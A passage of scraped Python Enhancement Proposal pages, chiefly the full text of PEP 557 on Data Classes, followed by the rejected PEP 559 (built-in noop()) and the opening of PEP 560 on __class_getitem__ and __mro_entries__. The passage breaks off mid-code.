08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018
Resolution:
Python-Dev message
Table of Contents
Notice for Reviewers
Abstract
Rationale
Specification
Field objects
post-init processing
Class variables
Init-only variables
Frozen instances
Inheritance
Default factory functions
Mutable default values
Module level helper functions
Discussion
python-ideas discussion
Support for automatically setting __slots__?
Why not just use namedtuple?
Why not just use typing.NamedTuple?
Why not just use attrs?
post-init parameters
asdict and astuple function names
Rejected ideas
Copying init=False fields after new object creation in replace()
Automatically support mutable default values
Examples
Custom __init__ method
A complicated example
Acknowledgements
References
Copyright
Notice for Reviewers
This PEP and the initial implementation were drafted in a separate
repo: https://github.com/ericvsmith/dataclasses. Before commenting in
a public forum please at least read the discussion listed at the
end of this PEP.
Abstract
This PEP describes an addition to the standard library called Data
Classes. Although they use a very different mechanism, Data Classes
can be thought of as “mutable namedtuples with defaults”. Because
Data Classes use normal class definition syntax, you are free to use
inheritance, metaclasses, docstrings, user-defined methods, class
factories, and other Python class features.
A class decorator is provided which inspects a class definition for
variables with type annotations as defined in PEP 526, “Syntax for
Variable Annotations”. In this document, such variables are called
fields. Using these fields, the decorator adds generated method
definitions to the class to support instance initialization, a repr,
comparison methods, and optionally other methods as described in the
Specification section. Such a class is called a Data Class, but
there’s really nothing special about the class: the decorator adds
generated methods to the class and returns the same class it was
given.
As an example:
@dataclass
class InventoryItem:
'''Class for keeping track of an item in inventory.'''
name: str
unit_price: float
quantity_on_hand: int = 0
def total_cost(self) -> float:
return self.unit_price * self.quantity_on_hand
The @dataclass decorator will add the equivalent of these methods
to the InventoryItem class:
def __init__(self, name: str, unit_price: float, quantity_on_hand: int = 0) -> None:
self.name = name
self.unit_price = unit_price
self.quantity_on_hand = quantity_on_hand
def __repr__(self):
return f'InventoryItem(name={self.name!r}, unit_price={self.unit_price!r}, quantity_on_hand={self.quantity_on_hand!r})'
def __eq__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) == (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __ne__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) != (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __lt__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) < (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __le__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) <= (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __gt__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) > (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __ge__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) >= (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
Data Classes save you from writing and maintaining these methods.
Rationale
There have been numerous attempts to define classes which exist
primarily to store values which are accessible by attribute lookup.
Some examples include:
collections.namedtuple in the standard library.
typing.NamedTuple in the standard library.
The popular attrs [1] project.
George Sakkis’ recordType recipe [2], a mutable data type inspired
by collections.namedtuple.
Many example online recipes [3], packages [4], and questions [5].
David Beazley used a form of data classes as the motivating example
in a PyCon 2013 metaclass talk [6].
So, why is this PEP needed?
With the addition of PEP 526, Python has a concise way to specify the
type of class members. This PEP leverages that syntax to provide a
simple, unobtrusive way to describe Data Classes. With two exceptions,
the specified attribute type annotation is completely ignored by Data
Classes.
No base classes or metaclasses are used by Data Classes. Users of
these classes are free to use inheritance and metaclasses without any
interference from Data Classes. The decorated classes are truly
“normal” Python classes. The Data Class decorator should not
interfere with any usage of the class.
One main design goal of Data Classes is to support static type
checkers. The use of PEP 526 syntax is one example of this, but so is
the design of the fields() function and the @dataclass
decorator. Due to their very dynamic nature, some of the libraries
mentioned above are difficult to use with static type checkers.
Data Classes are not, and are not intended to be, a replacement
mechanism for all of the above libraries. But being in the standard
library will allow many of the simpler use cases to instead leverage
Data Classes. Many of the libraries listed have different feature
sets, and will of course continue to exist and prosper.
Where is it not appropriate to use Data Classes?
API compatibility with tuples or dicts is required.
Type validation beyond that provided by PEPs 484 and 526 is
required, or value validation or conversion is required.
Specification
All of the functions described in this PEP will live in a module named
dataclasses.
A function dataclass which is typically used as a class decorator
is provided to post-process classes and add generated methods,
described below.
The dataclass decorator examines the class to find fields. A
field is defined as any variable identified in
__annotations__. That is, a variable that has a type annotation.
With two exceptions described below, none of the Data Class machinery
examines the type specified in the annotation.
Note that __annotations__ is guaranteed to be an ordered mapping,
in class declaration order. The order of the fields in all of the
generated methods is the order in which they appear in the class.
The dataclass decorator will add various “dunder” methods to the
class, described below. If any of the added methods already exist on the
class, a TypeError will be raised. The decorator returns the same
class that is called on: no new class is created.
The dataclass decorator is typically used with no parameters and
no parentheses. However, it also supports the following logical
signature:
def dataclass(*, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
If dataclass is used just as a simple decorator with no
parameters, it acts as if it has the default values documented in this
signature. That is, these three uses of @dataclass are equivalent:
@dataclass
class C:
...
@dataclass()
class C:
...
@dataclass(init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
class C:
...
The parameters to dataclass are:
init: If true (the default), a __init__ method will be
generated.
repr: If true (the default), a __repr__ method will be
generated. The generated repr string will have the class name and
the name and repr of each field, in the order they are defined in
the class. Fields that are marked as being excluded from the repr
are not included. For example:
InventoryItem(name='widget', unit_price=3.0, quantity_on_hand=10).If the class already defines __repr__, this parameter is
ignored.
eq: If true (the default), an __eq__ method will be
generated. This method compares the class as if it were a tuple of its
fields, in order. Both instances in the comparison must be of the
identical type.If the class already defines __eq__, this parameter is ignored.
order: If true (the default is False), __lt__, __le__,
__gt__, and __ge__ methods will be generated. These compare
the class as if it were a tuple of its fields, in order. Both
instances in the comparison must be of the identical type. If
order is true and eq is false, a ValueError is raised.If the class already defines any of __lt__, __le__,
__gt__, or __ge__, then ValueError is raised.
unsafe_hash: If False (the default), the __hash__ method
is generated according to how eq and frozen are set.If eq and frozen are both true, Data Classes will generate a
__hash__ method for you. If eq is true and frozen is
false, __hash__ will be set to None, marking it unhashable
(which it is). If eq is false, __hash__ will be left
untouched meaning the __hash__ method of the superclass will be
used (if the superclass is object, this means it will fall back
to id-based hashing).
Although not recommended, you can force Data Classes to create a
__hash__ method with unsafe_hash=True. This might be the
case if your class is logically immutable but can nonetheless be
mutated. This is a specialized use case and should be considered
carefully.
If a class already has an explicitly defined __hash__ the
behavior when adding __hash__ is modified. An explicitly
defined __hash__ is defined when:
__eq__ is defined in the class and __hash__ is defined
with any value other than None.
__eq__ is defined in the class and any non-None
__hash__ is defined.
__eq__ is not defined on the class, and any __hash__ is
defined.
If unsafe_hash is true and an explicitly defined __hash__
is present, then ValueError is raised.
If unsafe_hash is false and an explicitly defined __hash__
is present, then no __hash__ is added.
See the Python documentation [7] for more information.
frozen: If true (the default is False), assigning to fields will
generate an exception. This emulates read-only frozen instances.
If either __getattr__ or __setattr__ is defined in the
class, then ValueError is raised. See the discussion below.
fields may optionally specify a default value, using normal
Python syntax:
@dataclass
class C:
a: int # 'a' has no default value
b: int = 0 # assign a default value for 'b'
In this example, both a and b will be included in the added
__init__ method, which will be defined as:
def __init__(self, a: int, b: int = 0):
TypeError will be raised if a field without a default value
follows a field with a default value. This is true either when this
occurs in a single class, or as a result of class inheritance.
For common and simple use cases, no other functionality is required.
There are, however, some Data Class features that require additional
per-field information. To satisfy this need for additional
information, you can replace the default field value with a call to
the provided field() function. The signature of field() is:
def field(*, default=MISSING, default_factory=MISSING, repr=True,
hash=None, init=True, compare=True, metadata=None)
The MISSING value is a sentinel object used to detect if the
default and default_factory parameters are provided. This
sentinel is used because None is a valid value for default.
The parameters to field() are:
default: If provided, this will be the default value for this
field. This is needed because the field call itself replaces
the normal position of the default value.
default_factory: If provided, it must be a zero-argument
callable that will be called when a default value is needed for this
field. Among other purposes, this can be used to specify fields
with mutable default values, as discussed below. It is an error to
specify both default and default_factory.
init: If true (the default), this field is included as a
parameter to the generated __init__ method.
repr: If true (the default), this field is included in the
string returned by the generated __repr__ method.
compare: If True (the default), this field is included in the
generated equality and comparison methods (__eq__, __gt__,
et al.).
hash: This can be a bool or None. If True, this field is
included in the generated __hash__ method. If None (the
default), use the value of compare: this would normally be the
expected behavior. A field should be considered in the hash if
it’s used for comparisons. Setting this value to anything other
than None is discouraged.One possible reason to set hash=False but compare=True would
be if a field is expensive to compute a hash value for, that field
is needed for equality testing, and there are other fields that
contribute to the type’s hash value. Even if a field is excluded
from the hash, it will still be used for comparisons.
metadata: This can be a mapping or None. None is treated as an
empty dict. This value is wrapped in types.MappingProxyType to
make it read-only, and exposed on the Field object. It is not used
at all by Data Classes, and is provided as a third-party extension
mechanism. Multiple third-parties can each have their own key, to
use as a namespace in the metadata.
If the default value of a field is specified by a call to field(),
then the class attribute for this field will be replaced by the
specified default value. If no default is provided, then the
class attribute will be deleted. The intent is that after the
dataclass decorator runs, the class attributes will all contain
the default values for the fields, just as if the default value itself
were specified. For example, after:
@dataclass
class C:
x: int
y: int = field(repr=False)
z: int = field(repr=False, default=10)
t: int = 20
The class attribute C.z will be 10, the class attribute
C.t will be 20, and the class attributes C.x and C.y
will not be set.
Field objects
Field objects describe each defined field. These objects are
created internally, and are returned by the fields() module-level
method (see below). Users should never instantiate a Field
object directly. Its documented attributes are:
name: The name of the field.
type: The type of the field.
default, default_factory, init, repr, hash,
compare, and metadata have the identical meaning and values
as they do in the field() declaration.
Other attributes may exist, but they are private and must not be
inspected or relied on.
post-init processing
The generated __init__ code will call a method named
__post_init__, if it is defined on the class. It will be called
as self.__post_init__(). If no __init__ method is generated,
then __post_init__ will not automatically be called.
Among other uses, this allows for initializing field values that
depend on one or more other fields. For example:
@dataclass
class C:
a: float
b: float
c: float = field(init=False)
def __post_init__(self):
self.c = self.a + self.b
See the section below on init-only variables for ways to pass
parameters to __post_init__(). Also see the warning about how
replace() handles init=False fields.
Class variables
One place where dataclass actually inspects the type of a field is
to determine if a field is a class variable as defined in PEP 526. It
does this by checking if the type of the field is typing.ClassVar.
If a field is a ClassVar, it is excluded from consideration as a
field and is ignored by the Data Class mechanisms. For more
discussion, see [8]. Such ClassVar pseudo-fields are not
returned by the module-level fields() function.
Init-only variables
The other place where dataclass inspects a type annotation is to
determine if a field is an init-only variable. It does this by seeing
if the type of a field is of type dataclasses.InitVar. If a field
is an InitVar, it is considered a pseudo-field called an init-only
field. As it is not a true field, it is not returned by the
module-level fields() function. Init-only fields are added as
parameters to the generated __init__ method, and are passed to
the optional __post_init__ method. They are not otherwise used
by Data Classes.
For example, suppose a field will be initialized from a database, if a
value is not provided when creating the class:
@dataclass
class C:
i: int
j: int = None
database: InitVar[DatabaseType] = None
def __post_init__(self, database):
if self.j is None and database is not None:
self.j = database.lookup('j')
c = C(10, database=my_database)
In this case, fields() will return Field objects for i and
j, but not for database.
Frozen instances
It is not possible to create truly immutable Python objects. However,
by passing frozen=True to the @dataclass decorator you can
emulate immutability. In that case, Data Classes will add
__setattr__ and __delattr__ methods to the class. These
methods will raise a FrozenInstanceError when invoked.
There is a tiny performance penalty when using frozen=True:
__init__ cannot use simple assignment to initialize fields, and
must use object.__setattr__.
Inheritance
When the Data Class is being created by the @dataclass decorator,
it looks through all of the class’s base classes in reverse MRO (that
is, starting at object) and, for each Data Class that it finds,
adds the fields from that base class to an ordered mapping of fields.
After all of the base class fields are added, it adds its own fields
to the ordered mapping. All of the generated methods will use this
combined, calculated ordered mapping of fields. Because the fields
are in insertion order, derived classes override base classes. An
example:
@dataclass
class Base:
x: Any = 15.0
y: int = 0
@dataclass
class C(Base):
z: int = 10
x: int = 15
The final list of fields is, in order, x, y, z. The final
type of x is int, as specified in class C.
The generated __init__ method for C will look like:
def __init__(self, x: int = 15, y: int = 0, z: int = 10):
Default factory functions
If a field specifies a default_factory, it is called with zero
arguments when a default value for the field is needed. For example,
to create a new instance of a list, use:
l: list = field(default_factory=list)
If a field is excluded from __init__ (using init=False) and
the field also specifies default_factory, then the default factory
function will always be called from the generated __init__
function. This happens because there is no other way to give the
field an initial value.
Mutable default values
Python stores default member variable values in class attributes.
Consider this example, not using Data Classes:
class C:
x = []
def add(self, element):
self.x += element
o1 = C()
o2 = C()
o1.add(1)
o2.add(2)
assert o1.x == [1, 2]
assert o1.x is o2.x
Note that the two instances of class C share the same class
variable x, as expected.
Using Data Classes, if this code was valid:
@dataclass
class D:
x: List = []
def add(self, element):
self.x += element
it would generate code similar to:
class D:
x = []
def __init__(self, x=x):
self.x = x
def add(self, element):
self.x += element
assert D().x is D().x
This has the same issue as the original example using class C.
That is, two instances of class D that do not specify a value for
x when creating a class instance will share the same copy of
x. Because Data Classes just use normal Python class creation
they also share this problem. There is no general way for Data
Classes to detect this condition. Instead, Data Classes will raise a
TypeError if it detects a default parameter of type list,
dict, or set. This is a partial solution, but it does protect
against many common errors. See Automatically support mutable
default values in the Rejected Ideas section for more details.
Using default factory functions is a way to create new instances of
mutable types as default values for fields:
@dataclass
class D:
x: list = field(default_factory=list)
assert D().x is not D().x
Module level helper functions
fields(class_or_instance): Returns a tuple of Field objects
that define the fields for this Data Class. Accepts either a Data
Class, or an instance of a Data Class. Raises ValueError if not
passed a Data Class or instance of one. Does not return
pseudo-fields which are ClassVar or InitVar.
asdict(instance, *, dict_factory=dict): Converts the Data Class
instance to a dict (by using the factory function
dict_factory). Each Data Class is converted to a dict of its
fields, as name:value pairs. Data Classes, dicts, lists, and tuples
are recursed into. For example:@dataclass
class Point:
x: int
y: int
@dataclass
class C:
l: List[Point]
p = Point(10, 20)
assert asdict(p) == {'x': 10, 'y': 20}
c = C([Point(0, 0), Point(10, 4)])
assert asdict(c) == {'l': [{'x': 0, 'y': 0}, {'x': 10, 'y': 4}]}
Raises TypeError if instance is not a Data Class instance.
astuple(*, tuple_factory=tuple): Converts the Data Class
instance to a tuple (by using the factory function
tuple_factory). Each Data Class is converted to a tuple of its
field values. Data Classes, dicts, lists, and tuples are recursed
into.Continuing from the previous example:
assert astuple(p) == (10, 20)
assert astuple(c) == ([(0, 0), (10, 4)],)
Raises TypeError if instance is not a Data Class instance.
make_dataclass(cls_name, fields, *, bases=(), namespace=None):
Creates a new Data Class with name cls_name, fields as defined
in fields, base classes as given in bases, and initialized
with a namespace as given in namespace. fields is an
iterable whose elements are either name, (name, type), or
(name, type, Field). If just name is supplied,
typing.Any is used for type. This function is not strictly
required, because any Python mechanism for creating a new class with
__annotations__ can then apply the dataclass function to
convert that class to a Data Class. This function is provided as a
convenience. For example:C = make_dataclass('C',
[('x', int),
'y',
('z', int, field(default=5))],
namespace={'add_one': lambda self: self.x + 1})
Is equivalent to:
@dataclass
class C:
x: int
y: 'typing.Any'
z: int = 5
def add_one(self):
return self.x + 1
replace(instance, **changes): Creates a new object of the same
type of instance, replacing fields with values from changes.
If instance is not a Data Class, raises TypeError. If
values in changes do not specify fields, raises TypeError.The newly returned object is created by calling the __init__
method of the Data Class. This ensures that
__post_init__, if present, is also called.
Init-only variables without default values, if any exist, must be
specified on the call to replace so that they can be passed to
__init__ and __post_init__.
It is an error for changes to contain any fields that are
defined as having init=False. A ValueError will be raised
in this case.
Be forewarned about how init=False fields work during a call to
replace(). They are not copied from the source object, but
rather are initialized in __post_init__(), if they’re
initialized at all. It is expected that init=False fields will
be rarely and judiciously used. If they are used, it might be wise
to have alternate class constructors, or perhaps a custom
replace() (or similarly named) method which handles instance
copying.
is_dataclass(class_or_instance): Returns True if its parameter
is a dataclass or an instance of one, otherwise returns False.If you need to know if a class is an instance of a dataclass (and
not a dataclass itself), then add a further check for not
isinstance(obj, type):
def is_dataclass_instance(obj):
return is_dataclass(obj) and not isinstance(obj, type)
Discussion
python-ideas discussion
This discussion started on python-ideas [9] and was moved to a GitHub
repo [10] for further discussion. As part of this discussion, we made
the decision to use PEP 526 syntax to drive the discovery of fields.
Support for automatically setting __slots__?
At least for the initial release, __slots__ will not be supported.
__slots__ needs to be added at class creation time. The Data
Class decorator is called after the class is created, so in order to
add __slots__ the decorator would have to create a new class, set
__slots__, and return it. Because this behavior is somewhat
surprising, the initial version of Data Classes will not support
automatically setting __slots__. There are a number of
workarounds:
Manually add __slots__ in the class definition.
Write a function (which could be used as a decorator) that inspects
the class using fields() and creates a new class with
__slots__ set.
For more discussion, see [11].
Why not just use namedtuple?
Any namedtuple can be accidentally compared to any other with the
same number of fields. For example: Point3D(2017, 6, 2) ==
Date(2017, 6, 2). With Data Classes, this would return False.
A namedtuple can be accidentally compared to a tuple. For example,
Point2D(1, 10) == (1, 10). With Data Classes, this would return
False.
Instances are always iterable, which can make it difficult to add
fields. If a library defines:Time = namedtuple('Time', ['hour', 'minute'])
def get_time():
return Time(12, 0)
Then if a user uses this code as:
hour, minute = get_time()
then it would not be possible to add a second field to Time
without breaking the user’s code.
No option for mutable instances.
Cannot specify default values.
Cannot control which fields are used for __init__, __repr__,
etc.
Cannot support combining fields by inheritance.
Why not just use typing.NamedTuple?
For classes with statically defined fields, it does support similar
syntax to Data Classes, using type annotations. This produces a
namedtuple, so it shares namedtuples benefits and some of its
downsides. Data Classes, unlike typing.NamedTuple, support
combining fields via inheritance.
Why not just use attrs?
attrs moves faster than could be accommodated if it were moved in to
the standard library.
attrs supports additional features not being proposed here:
validators, converters, metadata, etc. Data Classes makes a
tradeoff to achieve simplicity by not implementing these
features.
For more discussion, see [12].
post-init parameters
In an earlier version of this PEP before InitVar was added, the
post-init function __post_init__ never took any parameters.
The normal way of doing parameterized initialization (and not just
with Data Classes) is to provide an alternate classmethod constructor.
For example:
@dataclass
class C:
x: int
@classmethod
def from_file(cls, filename):
with open(filename) as fl:
file_value = int(fl.read())
return C(file_value)
c = C.from_file('file.txt')
Because the __post_init__ function is the last thing called in the
generated __init__, having a classmethod constructor (which can
also execute code immediately after constructing the object) is
functionally equivalent to being able to pass parameters to a
__post_init__ function.
With InitVars, __post_init__ functions can now take
parameters. They are passed first to __init__ which passes them
to __post_init__ where user code can use them as needed.
The only real difference between alternate classmethod constructors
and InitVar pseudo-fields is in regards to required non-field
parameters during object creation. With InitVars, using
__init__ and the module-level replace() function InitVars
must always be specified. Consider the case where a context
object is needed to create an instance, but isn’t stored as a field.
With alternate classmethod constructors the context parameter is
always optional, because you could still create the object by going
through __init__ (unless you suppress its creation). Which
approach is more appropriate will be application-specific, but both
approaches are supported.
Another reason for using InitVar fields is that the class author
can control the order of __init__ parameters. This is especially
important with regular fields and InitVar fields that have default
values, as all fields with defaults must come after all fields without
defaults. A previous design had all init-only fields coming after
regular fields. This meant that if any field had a default value,
then all init-only fields would have to have defaults values, too.
asdict and astuple function names
The names of the module-level helper functions asdict() and
astuple() are arguably not PEP 8 compliant, and should be
as_dict() and as_tuple(), respectively. However, after
discussion [13] it was decided to keep consistency with
namedtuple._asdict() and attr.asdict().
Rejected ideas
Copying init=False fields after new object creation in replace()
Fields that are init=False are by definition not passed to
__init__, but instead are initialized with a default value, or by
calling a default factory function in __init__, or by code in
__post_init__.
A previous version of this PEP specified that init=False fields
would be copied from the source object to the newly created object
after __init__ returned, but that was deemed to be inconsistent
with using __init__ and __post_init__ to initialize the new
object. For example, consider this case:
@dataclass
class Square:
length: float
area: float = field(init=False, default=0.0)
def __post_init__(self):
self.area = self.length * self.length
s1 = Square(1.0)
s2 = replace(s1, length=2.0)
If init=False fields were copied from the source to the
destination object after __post_init__ is run, then s2 would end
up begin Square(length=2.0, area=1.0), instead of the correct
Square(length=2.0, area=4.0).
Automatically support mutable default values
One proposal was to automatically copy defaults, so that if a literal
list [] was a default value, each instance would get a new list.
There were undesirable side effects of this decision, so the final
decision is to disallow the 3 known built-in mutable types: list,
dict, and set. For a complete discussion of this and other options,
see [14].
Examples
Custom __init__ method
Sometimes the generated __init__ method does not suffice. For
example, suppose you wanted to have an object to store *args and
**kwargs:
@dataclass(init=False)
class ArgHolder:
args: List[Any]
kwargs: Mapping[Any, Any]
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
a = ArgHolder(1, 2, three=3)
A complicated example
This code exists in a closed source project:
class Application:
def __init__(self, name, requirements, constraints=None, path='', executable_links=None, executables_dir=()):
self.name = name
self.requirements = requirements
self.constraints = {} if constraints is None else constraints
self.path = path
self.executable_links = [] if executable_links is None else executable_links
self.executables_dir = executables_dir
self.additional_items = []
def __repr__(self):
return f'Application({self.name!r},{self.requirements!r},{self.constraints!r},{self.path!r},{self.executable_links!r},{self.executables_dir!r},{self.additional_items!r})'
This can be replaced by:
@dataclass
class Application:
name: str
requirements: List[Requirement]
constraints: Dict[str, str] = field(default_factory=dict)
path: str = ''
executable_links: List[str] = field(default_factory=list)
executable_dir: Tuple[str] = ()
additional_items: List[str] = field(init=False, default_factory=list)
The Data Class version is more declarative, has less code, supports
typing, and includes the other generated functions.
Acknowledgements
The following people provided invaluable input during the development
of this PEP and code: Ivan Levkivskyi, Guido van Rossum, Hynek
Schlawack, Raymond Hettinger, and Lisa Roach. I thank them for their
time and expertise.
A special mention must be made about the attrs project. It was a
true inspiration for this PEP, and I respect the design decisions they
made.
References
[1]
attrs project on github
(https://github.com/python-attrs/attrs)
[2]
George Sakkis’ recordType recipe
(http://code.activestate.com/recipes/576555-records/)
[3]
DictDotLookup recipe
(http://code.activestate.com/recipes/576586-dot-style-nested-lookups-over-dictionary-based-dat/)
[4]
attrdict package
(https://pypi.python.org/pypi/attrdict)
[5]
StackOverflow question about data container classes
(https://stackoverflow.com/questions/3357581/using-python-class-as-a-data-container)
[6]
David Beazley metaclass talk featuring data classes
(https://www.youtube.com/watch?v=sPiWg5jSoZI)
[7]
Python documentation for __hash__
(https://docs.python.org/3/reference/datamodel.html#object.__hash__)
[8]
ClassVar discussion in PEP 526
[9]
Start of python-ideas discussion
(https://mail.python.org/pipermail/python-ideas/2017-May/045618.html)
[10]
GitHub repo where discussions and initial development took place
(https://github.com/ericvsmith/dataclasses)
[11]
Support __slots__?
(https://github.com/ericvsmith/dataclasses/issues/28)
[12]
why not just attrs?
(https://github.com/ericvsmith/dataclasses/issues/19)
[13]
PEP 8 names for asdict and astuple
(https://github.com/ericvsmith/dataclasses/issues/110)
[14]
Copying mutable defaults
(https://github.com/ericvsmith/dataclasses/issues/3)
Copyright
This document has been placed in the public domain.
| Final | PEP 557 – Data Classes | Standards Track | This PEP describes an addition to the standard library called Data
Classes. Although they use a very different mechanism, Data Classes
can be thought of as “mutable namedtuples with defaults”. Because
Data Classes use normal class definition syntax, you are free to use
inheritance, metaclasses, docstrings, user-defined methods, class
factories, and other Python class features. |
PEP 559 – Built-in noop()
Author:
Barry Warsaw <barry at python.org>
Status:
Rejected
Type:
Standards Track
Created:
08-Sep-2017
Python-Version:
3.7
Post-History:
09-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Implementation
Rejected alternatives
noop() returns something
References
Copyright
Abstract
This PEP proposes adding a new built-in function called noop() which does
nothing but return None.
Rationale
It is trivial to implement a no-op function in Python. It’s so easy in fact
that many people do it many times over and over again. It would be useful in
many cases to have a common built-in function that does nothing.
One use case would be for PEP 553, where you could set the breakpoint
environment variable to the following in order to effectively disable it:
$ setenv PYTHONBREAKPOINT=noop
Implementation
The Python equivalent of the noop() function is exactly:
def noop(*args, **kws):
return None
The C built-in implementation is available as a pull request [1].
Rejected alternatives
noop() returns something
YAGNI.
This is rejected because it complicates the semantics. For example, if you
always return both *args and **kws, what do you return when none of
those are given? Returning a tuple of ((), {}) is kind of ugly, but
provides consistency. But you might also want to just return None since
that’s also conceptually what the function was passed.
Or, what if you pass in exactly one positional argument, e.g. noop(7). Do
you return 7 or ((7,), {})? And so on.
The author claims that you won’t ever need the return value of noop() so
it will always return None.
Coghlan’s Dialogs (edited for formatting):
My counterargument to this would be map(noop, iterable),
sorted(iterable, key=noop), etc. (filter, max, and
min all accept callables that accept a single argument, as do
many of the itertools operations).Making noop() a useful default function in those cases just
needs the definition to be:
def noop(*args, **kwds):
return args[0] if args else None
The counterargument to the counterargument is that using None
as the default in all these cases is going to be faster, since it
lets the algorithm skip the callback entirely, rather than calling
it and having it do nothing useful.
References
[1]
https://github.com/python/cpython/pull/3480
Copyright
This document has been placed in the public domain.
| Rejected | PEP 559 – Built-in noop() | Standards Track | This PEP proposes adding a new built-in function called noop() which does
nothing but return None. |
PEP 560 – Core support for typing module and generic types
Author:
Ivan Levkivskyi <levkivskyi at gmail.com>
Status:
Final
Type:
Standards Track
Created:
03-Sep-2017
Python-Version:
3.7
Post-History:
09-Sep-2017, 14-Nov-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Performance
Metaclass conflicts
Hacks and bugs that will be removed by this proposal
Specification
__class_getitem__
__mro_entries__
Dynamic class creation and types.resolve_bases
Using __class_getitem__ in C extensions
Backwards compatibility and impact on users who don’t use typing
References
Copyright
Important
This PEP is a historical document. The up-to-date, canonical documentation can now be found at object.__class_getitem__() and
object.__mro_entries__().
×
See PEP 1 for how to propose changes.
Abstract
Initially PEP 484 was designed in such way that it would not introduce
any changes to the core CPython interpreter. Now type hints and
the typing module are extensively used by the community, e.g. PEP 526
and PEP 557 extend the usage of type hints, and the backport of typing
on PyPI has 1M downloads/month. Therefore, this restriction can be removed.
It is proposed to add two special methods __class_getitem__ and
__mro_entries__ to the core CPython for better support of
generic types.
Rationale
The restriction to not modify the core CPython interpreter led to some
design decisions that became questionable when the typing module started
to be widely used. There are three main points of concern:
performance of the typing module, metaclass conflicts, and the large
number of hacks currently used in typing.
Performance
The typing module is one of the heaviest and slowest modules in
the standard library even with all the optimizations made. Mainly this is
because subscripted generic types (see PEP 484 for definition of terms used
in this PEP) are class objects (see also [1]). There are three main ways how
the performance can be improved with the help of the proposed special methods:
Creation of generic classes is slow since the GenericMeta.__new__ is
very slow; we will not need it anymore.
Very long method resolution orders (MROs) for generic classes will be
half as long; they are present because we duplicate the collections.abc
inheritance chain in typing.
Instantiation of generic classes will be faster (this is minor however).
Metaclass conflicts
All generic types are instances of GenericMeta, so if a user uses
a custom metaclass, then it is hard to make a corresponding class generic.
This is particularly hard for library classes that a user doesn’t control.
A workaround is to always mix-in GenericMeta:
class AdHocMeta(GenericMeta, LibraryMeta):
pass
class UserClass(LibraryBase, Generic[T], metaclass=AdHocMeta):
...
but this is not always practical or even possible. With the help of the
proposed special attributes the GenericMeta metaclass will not be needed.
Hacks and bugs that will be removed by this proposal
_generic_new hack that exists because __init__ is not called on
instances with a type differing from the type whose __new__ was called,
C[int]().__class__ is C.
_next_in_mro speed hack will be not necessary since subscription will
not create new classes.
Ugly sys._getframe hack. This one is particularly nasty since it looks
like we can’t remove it without changes outside typing.
Currently generics do dangerous things with private ABC caches
to fix large memory consumption that grows at least as O(N2),
see [2]. This point is also important because it was recently proposed to
re-implement ABCMeta in C.
Problems with sharing attributes between subscripted generics,
see [3]. The current solution already uses __getattr__ and __setattr__,
but it is still incomplete, and solving this without the current proposal
will be hard and will need __getattribute__.
_no_slots_copy hack, where we clean up the class dictionary on every
subscription thus allowing generics with __slots__.
General complexity of the typing module. The new proposal will not
only allow to remove the above-mentioned hacks/bugs, but also simplify
the implementation, so that it will be easier to maintain.
Specification
__class_getitem__
The idea of __class_getitem__ is simple: it is an exact analog of
__getitem__ with an exception that it is called on a class that
defines it, not on its instances. This allows us to avoid
GenericMeta.__getitem__ for things like Iterable[int].
The __class_getitem__ is automatically a class method and
does not require @classmethod decorator (similar to
__init_subclass__) and is inherited like normal attributes.
For example:
class MyList:
def __getitem__(self, index):
return index + 1
def __class_getitem__(cls, item):
return f"{cls.__name__}[{item.__name__}]"
class MyOtherList(MyList):
pass
assert MyList()[0] == 1
assert MyList[int] == "MyList[int]"
assert MyOtherList()[0] == 1
assert MyOtherList[int] == "MyOtherList[int]"
Note that this method is used as a fallback, so if a metaclass defines
__getitem__, then that will have the priority.
__mro_entries__
If an object that is not a class object appears in the tuple of bases of
a class definition, then method __mro_entries__ is searched on it.
If found, it is called with the original tuple of bases as an argument.
The result of the call must be a tuple, that is unpacked in the base classes
in place of this object. (If the tuple is empty, this means that the original
bases is simply discarded.) If there are more than one object with
__mro_entries__, then all of them are called with the same original tuple
of bases. This step happens first in the process of creation of a class,
all other steps, including checks for duplicate bases and MRO calculation,
happen normally with the updated bases.
Using the method API instead of just an attribute is necessary to avoid
inconsistent MRO errors, and perform other manipulations that are currently
done by GenericMeta.__new__. The original bases are stored as
__orig_bases__ in the class namespace (currently this is also done by
the metaclass). For example:
class GenericAlias:
def __init__(self, origin, item):
self.origin = origin
self.item = item
def __mro_entries__(self, bases):
return (self.origin,)
class NewList:
def __class_getitem__(cls, item):
return GenericAlias(cls, item)
class Tokens(NewList[int]):
...
assert Tokens.__bases__ == (NewList,)
assert Tokens.__orig_bases__ == (NewList[int],)
assert Tokens.__mro__ == (Tokens, NewList, object)
Resolution using __mro_entries__ happens only in bases of a class
definition statement. In all other situations where a class object is
expected, no such resolution will happen, this includes isinstance
and issubclass built-in functions.
NOTE: These two method names are reserved for use by the typing module
and the generic types machinery, and any other use is discouraged.
The reference implementation (with tests) can be found in [4], and
the proposal was originally posted and discussed on the typing tracker,
see [5].
Dynamic class creation and types.resolve_bases
type.__new__ will not perform any MRO entry resolution. So that a direct
call type('Tokens', (List[int],), {}) will fail. This is done for
performance reasons and to minimize the number of implicit transformations.
Instead, a helper function resolve_bases will be added to
the types module to allow an explicit __mro_entries__ resolution in
the context of dynamic class creation. Correspondingly, types.new_class
will be updated to reflect the new class creation steps while maintaining
the backwards compatibility:
def new_class(name, bases=(), kwds=None, exec_body=None):
